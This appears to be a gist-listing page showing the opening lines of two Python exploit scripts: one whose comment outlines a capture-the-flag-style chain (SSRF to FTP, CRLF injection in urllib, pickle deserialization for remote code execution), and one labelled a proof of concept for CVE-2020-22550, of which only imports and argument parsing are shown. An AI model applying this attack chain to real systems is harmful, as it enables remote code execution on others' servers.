View oh-my-bet.py
import requests
import string
import random
import socket
"""
TL;DR
1- SSRF to ftp through the avatar parameter on /login
2- Abuse the CRLF injection in python urllib to inject ftp commands
3- make a bson serialization payload and put the session val to be a pickle serialization to gain RCE
Sp3eD-X / veno.py
Last active Mar 15, 2021
PoC for CVE-2020-22550
View veno.py
import requests
import base64
import zipfile
import io
import sys
import argparse
class Args(object):
    def __init__(self):
        self.parser = argparse.ArgumentParser()